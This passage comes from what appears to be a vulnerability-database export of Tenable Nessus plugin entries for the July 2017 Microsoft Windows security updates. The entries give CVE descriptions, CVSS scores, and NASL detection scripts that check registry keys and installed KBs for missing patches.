(CVE-2017-8594)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. 
(CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4025336/windows-8-update-kb4025336\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60b27ab9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025333 or Cumulative update KB4025336.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-07';\nkbs = make_list(\n '4025333', # 8.1 / 2012 R2 Security Only\n '4025336' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = 
TRUE;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"07_2017\", bulletin:bulletin, rollup_kb_list:[4025333, 4025336]) || vuln)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:04", "description": "The remote Windows host is missing security update 4025337\nor cumulative update 4025341. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. 
A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. 
An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. 
(CVE-2017-8592)", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 July 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_4025341.NASL", "href": "https://www.tenable.com/plugins/nessus/101367", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101367);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99398,\n 99400,\n 99402,\n 99409,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025341\");\n script_xref(name:\"MSFT\", value:\"MS17-4025341\");\n script_xref(name:\"MSKB\", value:\"4025337\");\n script_xref(name:\"MSFT\", value:\"MS17-4025337\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 July 2017 Security Updates\");\n 
script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025337\nor cumulative update 4025341. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. 
(CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\");\n # https://support.microsoft.com/en-us/help/4025337/windows-7-update-kb4025337\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d2f3807\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025337 or Cumulative update KB4025341.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\nkbs = make_list(\"4025341\", \"4025337\");\nvuln = FALSE;\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n 
item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"07_2017\", bulletin:bulletin, rollup_kb_list:[4025341, 4025337])\n)\n vuln = TRUE;\n\nif (vuln)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:08", "description": "The remote Windows host is missing security update 4025343\nor cumulative update 4025331. It is, therefore, affected by\nmultiple vulnerabilities :\n\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. 
(CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). 
An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. 
A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8610)", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows Server 2012 July 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_WIN2012.NASL", "href": "https://www.tenable.com/plugins/nessus/101375", "sourceData": "#\n# (C) Tenable Network Security, 